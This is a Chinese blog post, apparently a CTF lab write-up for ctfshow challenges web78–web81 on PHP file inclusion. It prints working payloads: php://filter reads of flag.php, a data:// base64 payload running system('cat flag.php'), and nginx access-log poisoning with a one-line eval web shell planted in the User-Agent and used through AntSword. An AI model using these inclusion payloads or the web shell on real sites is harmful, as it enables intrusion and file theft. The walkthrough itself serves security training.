ctfshow web入门 web文件包含 web78--web81

本文介绍了PHP中使用伪协议进行文件操作时的安全隐患,如如何利用`php://filter`绕过过滤并查看flag.php内容,以及`data:`绕过方式访问日志文件。作者还提到使用`eval()`执行恶意代码并通过私信分享安全防范经验。
摘要由CSDN通过智能技术生成

文件包含常与php伪协议在一起用

经验之谈,学长跟我说的

web78

在这里插入图片描述

先从最常用的开始(filter)

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php

构造payload为
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64密码
在这里插入图片描述
解密
在这里插入图片描述

web79

在这里插入图片描述php被过滤
用data绕过

data://text/plain;
base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
相当于
<?php system('cat flag.php');?>

构造payload

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
 

执行的操作就是查看flag.php
在这里插入图片描述查看源代码
在这里插入图片描述

web80

在这里插入图片描述data也被绕过
日志文件访问

?file=/var/log/nginx/access.log

在这里插入图片描述传马在user-argent

<?php eval($_POST['a']);?>

然后antsword连接
在这里插入图片描述不会antsword的连接的来私聊或者评论教你

web81

在这里插入图片描述多了冒号,没影响
具体操作如web80
在这里插入图片描述打开fl0g.php
在这里插入图片描述
web78–web79也可以日志包含连接木马查看flag(本人已试过)

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值